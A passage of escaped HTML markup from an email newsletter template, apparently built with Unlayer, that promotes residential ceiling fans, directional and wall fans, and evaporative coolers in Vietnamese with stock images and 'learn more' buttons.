300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:165px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;<\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1695186067736-sunon_email_modern_white.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 17px; font-weight: 700;\\\">L\\u00c0M M\\u00c1T THO\\u00c1T - QU\\u1ea0T TH\\u1ed4I S\\u00c0N L\\u1edaN &amp; QU\\u1ea0T L\\u00c0M M\\u00c1T BAY H\\u01a0I<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; font-weight: 700; color: #f50f0f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 h\\u00e0ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Cho d\\u00f9 b\\u1ea1n c\\u1ea7n l\\u00e0m s\\u1ea1ch kh\\u00f3i hay l\\u00e0m m\\u00e1t cho nh\\u00e2n vi\\u00ean, qu\\u1ea1t th\\u1ed5i s\\u00e0n (Directional Fans) v\\u00e0 qu\\u1ea1t treo t\\u01b0\\u1eddng (Wall Fans) s\\u1ebd g\\u1eedi kh\\u00f4ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:134px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM &gt;&gt;<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1695185971739-directional_fan_sunon_email.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">S\\u1ef1 k\\u1ebft h\\u1ee3p ho\\u00e0n h\\u1ea3o v\\u1ec1 gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t tr\\u00ean cao (Ceilinfg Fan) v\\u00e0 qu\\u1ea1t l\\u00e0m m\\u00e1t bay h\\u01a1i (Evaporative Coolers) \\u0111\\u1ec3 mang l\\u1ea1i l\\u1ee3i \\u00edch c\\u1ee7a kh\\u1ea3 n\\u0103ng l\\u00e0m m\\u00e1t t\\u1ea1i ch\\u1ed7 m\\u1ea1nh m\\u1ebd v\\u00e0 t\\u1ed1c \\u0111\\u1ed9 kh\\u00f4ng kh\\u00ed cao \\u0111\\u1ebfn m\\u1ecdi ng\\u00f3c ng\\u00e1ch trong c\\u01a1 s\\u1edf c\\u1ee7a b\\u1ea1n. Khi \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng song song v\\u1edbi qu\\u1ea1t tr\\u00ean cao, qu\\u1ea1t \\u0111i\\u1ec1u ho\\u00e0 th\\u1ed5i s\\u00e0n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM &gt;&gt;<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301489264-home_space.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596365970938-7G9GXVu.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" 